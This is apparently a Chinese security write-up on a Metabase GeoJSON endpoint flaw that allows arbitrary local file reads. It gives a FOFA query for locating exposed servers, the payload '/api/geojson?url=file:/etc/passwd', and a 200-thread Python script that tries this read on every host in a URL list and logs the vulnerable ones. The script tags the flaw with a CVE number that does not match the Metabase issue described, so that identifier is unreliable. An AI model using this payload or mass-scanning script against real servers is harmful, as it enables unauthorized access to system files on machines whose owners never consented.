0x01 漏洞描述
metabase 是一个简单、开源的数据分析平台。自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。
0x02 影响范围
影响版本:
metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5
0x03 FOFA 查询
app="metabase"
0x04 环境搭建
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4
0x05 漏洞复现
/api/geojson?url=file:/etc/passwd
0x06 批量脚本
# -*- coding: utf-8 -*-
# @Time : 2021/11/21 17:37
# @Auth : AD钙奶
import requests
import threadpool
requests.packages.urllib3.disable_warnings()
def verify(urls):
url = urls + '/api/geojson?url=file:/etc/passwd'
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
try:
res = requests.get(url, headers=headers, timeout=10, verify=False, allow_redirects=False)
if 'root' in res.text:
info = "[+] 存在CVE-2021-36749漏洞: " + urls
save_vuln(info)
print(info)
except Exception as e:
# print(e)
pass
def save_vuln(info):
vuln = info + '\n'
with open("vuln.txt", 'a', encoding='utf-8') as ff:
ff.write(vuln)
def get_file_url():
with open("url.txt", 'r', encoding='UTF-8') as f:
_urls = f.readlines()
urls = [url.strip() for url in _urls if url and url.strip()]
return urls
def main():
url = get_file_url()
pool = threadpool.ThreadPool(200)
res = threadpool.makeRequests(verify, url)
[pool.putRequest(req) for req in res]
pool.wait()
if __name__ == "__main__":
main()
0x07 参考链接
https://mp.weixin.qq.com/s/XNwQuALcVmaK5Zb-3mTBzA